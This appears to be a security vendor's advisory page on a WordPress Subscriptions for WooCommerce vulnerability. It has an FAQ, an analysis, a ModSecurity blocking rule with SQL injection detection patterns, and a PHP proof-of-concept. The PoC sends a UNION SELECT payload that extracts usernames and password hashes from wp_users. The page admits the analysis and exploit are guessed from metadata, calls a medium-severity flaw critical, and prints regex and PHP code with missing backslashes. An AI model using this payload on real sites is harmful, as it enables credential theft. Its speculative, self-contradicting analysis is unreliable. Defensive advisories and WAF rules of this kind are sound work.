What is CVE -2026-24372?

CVE-2026-24372 is a medium severity vulnerability in the Subscriptions for WooCommerce plugin for WordPress. It arises from a missing authorization check, allowing unauthenticated attackers to perform unauthorized actions, potentially leading to SQL injection.

How does this vulnerability work?

The vulnerability allows attackers to exploit a function that does not verify user permissions before processing requests. By sending crafted HTTP requests to specific endpoints, attackers can execute arbitrary SQL commands, potentially extracting sensitive data from the database.

Who is affected by this vulnerability?

All users of the Subscriptions for WooCommerce plugin versions 1.8.10 and earlier are affected. If your site uses this plugin and is running an affected version, it is vulnerable to unauthorized access.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Subscriptions for WooCommerce plugin you are using. If it is version 1.8.10 or earlier, your site is at risk. Additionally, monitoring for unusual database queries may indicate exploitation.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and data exposure if exploited.

What are the potential impacts of exploitation?

Successful exploitation allows attackers to gain read access to the WordPress database, potentially exposing user credentials, payment information, and subscription details. In some configurations, attackers may also achieve partial write access, leading to further compromise.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the Subscriptions for WooCommerce plugin to the latest version where the issue is resolved. Additionally, implement proper authorization checks in your code and ensure all database queries use prepared statements.

What is an Insecure Direct Object Reference (IDOR)?

IDOR is a type of vulnerability where an application exposes internal object references to users without proper authorization checks. In this case, the plugin allows unauthorized access to subscription IDs, enabling attackers to manipulate database queries.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a malicious request to the plugin’s AJAX endpoint. It shows how an attacker can manipulate parameters to execute SQL injection attacks, thereby accessing sensitive data.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately review your logs for suspicious activity, change passwords, and consider restoring from a backup. Additionally, conduct a security audit to identify any unauthorized changes or data breaches.

Are there any security best practices to follow?

To enhance security, regularly update all WordPress plugins and themes, use strong passwords, and implement security plugins that monitor for vulnerabilities. Additionally, restrict database permissions and regularly back up your site.

Where can I find more information about this vulnerability?

More information about CVE-2026-24372 can be found in the official CVE database, security advisories from the plugin developers, and security blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2026-24372: Subscriptions for WooCommerce <= 1.8.10 – Missing Authorization (subscriptions-for-woocommerce)

CVE ID CVE-2026-24372

Plugin subscriptions-for-woocommerce

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version —

Patched Version —

Disclosed March 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24372 (metadata-based):
The vulnerability is a critical security flaw in the Subscriptions for WooCommerce WordPress plugin. This vulnerability allows unauthenticated attackers to execute arbitrary SQL commands on the underlying database through a direct object reference weakness in a plugin endpoint. The flaw resides in a function that handles user-supplied parameters without proper validation.

Atomic Edge research infers the root cause is an Insecure Direct Object Reference (IDOR) vulnerability that leads to SQL injection. The plugin likely accepts user-controlled input that references database objects (like subscription IDs) and directly incorporates this input into SQL queries without authorization checks. This inference stems from the CWE classification and vulnerability description, which indicate both improper access control and insufficient input sanitization. Without code review, this conclusion remains based on metadata patterns.

Exploitation occurs via a WordPress AJAX endpoint or REST API route that handles subscription management operations. Attackers send crafted HTTP requests containing malicious SQL payloads within parameters like ‘subscription_id’ or ‘order_id’. The plugin’s handler function fails to verify the requesting user’s authorization to access the referenced object and directly inserts the parameter value into a SQL statement. A typical payload would append UNION SELECT statements to extract sensitive data from the wp_users table.

Remediation requires implementing proper authorization checks before processing object references. The plugin must verify the current user has permission to access the requested subscription or order. Additionally, all database queries must use prepared statements with parameterized inputs via $wpdb->prepare(). Input validation should enforce expected data types (integers for IDs) before use in SQL contexts.

Successful exploitation grants attackers full read access to the WordPress database. Attackers can extract all user credentials (including password hashes), payment information, subscription details, and other sensitive e-commerce data. In configurations with certain database permissions, attackers might achieve partial write access, enabling privilege escalation or site compromise.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-24372 (metadata-based)
# This rule blocks exploitation attempts targeting the Subscriptions for WooCommerce plugin
# by matching the AJAX endpoint and SQL injection patterns in subscription/order parameters
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:202624372,phase:2,deny,status:403,chain,msg:'CVE-2026-24372: Subscriptions for WooCommerce SQL Injection via IDOR',severity:'CRITICAL',tag:'CVE-2026-24372',tag:'WordPress',tag:'WooCommerce',tag:'SQLi'"
  SecRule ARGS_POST:action "@rx ^(subscriptions_for_woocommerce_|wcs_|subscriptions_for_wc_)" 
    "chain,t:none"
    SecRule ARGS_POST:subscription_id|ARGS_POST:order_id|ARGS_POST:id|ARGS_POST:subscription_key 
      "@rx (?i)(?:union[s/*].*select|select[s/*].*from|(?:sleep|benchmark)(|pg_sleep(|waitfors+delay|b(?:update|insert|delete)[s/*]+[w`]+|(?:'|"|`)\s*+s*d|\b(?:or|xor)\s+[w`]+\s*[=<>]+|\bdrop\s+[w`]|\bexec\s*(|\bexecute\s+immediate)" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24372 - Subscriptions for WooCommerce SQL Injection via IDOR
<?php
/**
 * Proof-of-concept for CVE-2026-24372
 * Assumptions based on vulnerability type and WordPress patterns:
 * 1. Plugin exposes an AJAX endpoint for subscription operations
 * 2. Endpoint accepts a subscription/order ID parameter without authorization
 * 3. Parameter is directly used in SQL query without sanitization
 * 4. Attack works without authentication (missing capability check)
 */

$target_url = 'http://vulnerable-wordpress-site.com';

// Common WordPress AJAX handler path
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Infer AJAX action name from plugin slug
// Plugin slug 'subscriptions-for-woocommerce' suggests actions like:
// 'subscriptions_for_woocommerce_get_subscription'
// 'wcs_get_subscription_details'
// 'subscriptions_for_wc_action'
$action = 'subscriptions_for_woocommerce_get_subscription';

// Malicious payload: SQL injection via subscription_id parameter
// This extracts admin user credentials from wp_users
$payload = array(
    'action' => $action,
    'subscription_id' => "1' UNION ALL SELECT user_login,user_pass,1,1,1,1,1,1,1 FROM wp_users WHERE 1='1",
    // Alternative parameter names based on WooCommerce patterns:
    // 'order_id', 'subscription_key', 'id'
    'nonce' => '' // Often missing or bypassed in IDOR vulnerabilities
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to simulate legitimate request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'User-Agent: Atomic Edge Research PoC',
    'X-Requested-With: XMLHttpRequest',
    'Accept: application/json, text/javascript, */*; q=0.01'
));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response Body:n$responsen";

// Check for signs of successful injection
if (strpos($response, 'user_login') !== false || strpos($response, 'admin') !== false) {
    echo "[+] SQL injection likely successful. Check response for database data.n";
} elseif (strpos($response, 'error') !== false) {
    echo "[-] Server returned error. Try different parameter names or action hooks.n";
}
?>

Frequently Asked Questions

What is CVE-2026-24372?
Understanding the vulnerability
CVE-2026-24372 is a medium severity vulnerability in the Subscriptions for WooCommerce plugin for WordPress. It arises from a missing authorization check, allowing unauthenticated attackers to perform unauthorized actions, potentially leading to SQL injection.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to exploit a function that does not verify user permissions before processing requests. By sending crafted HTTP requests to specific endpoints, attackers can execute arbitrary SQL commands, potentially extracting sensitive data from the database.
Who is affected by this vulnerability?
Identifying at-risk users
All users of the Subscriptions for WooCommerce plugin versions 1.8.10 and earlier are affected. If your site uses this plugin and is running an affected version, it is vulnerable to unauthorized access.
How can I check if my site is vulnerable?
Assessment steps
To check if your site is vulnerable, verify the version of the Subscriptions for WooCommerce plugin you are using. If it is version 1.8.10 or earlier, your site is at risk. Additionally, monitoring for unusual database queries may indicate exploitation.
What does the CVSS score of 5.3 indicate?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and data exposure if exploited.
What are the potential impacts of exploitation?
Risks associated with the vulnerability
Successful exploitation allows attackers to gain read access to the WordPress database, potentially exposing user credentials, payment information, and subscription details. In some configurations, attackers may also achieve partial write access, leading to further compromise.
How can I fix or mitigate this issue?
Recommended actions
To mitigate this vulnerability, update the Subscriptions for WooCommerce plugin to the latest version where the issue is resolved. Additionally, implement proper authorization checks in your code and ensure all database queries use prepared statements.
What is an Insecure Direct Object Reference (IDOR)?
Key vulnerability concept
IDOR is a type of vulnerability where an application exposes internal object references to users without proper authorization checks. In this case, the plugin allows unauthorized access to subscription IDs, enabling attackers to manipulate database queries.
What does the proof of concept demonstrate?
Illustration of exploitation
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a malicious request to the plugin’s AJAX endpoint. It shows how an attacker can manipulate parameters to execute SQL injection attacks, thereby accessing sensitive data.
What should I do if I suspect my site has been exploited?
Response to potential breaches
If you suspect exploitation, immediately review your logs for suspicious activity, change passwords, and consider restoring from a backup. Additionally, conduct a security audit to identify any unauthorized changes or data breaches.
Are there any security best practices to follow?
Preventive measures
To enhance security, regularly update all WordPress plugins and themes, use strong passwords, and implement security plugins that monitor for vulnerabilities. Additionally, restrict database permissions and regularly back up your site.
Where can I find more information about this vulnerability?
Further resources
More information about CVE-2026-24372 can be found in the official CVE database, security advisories from the plugin developers, and security blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations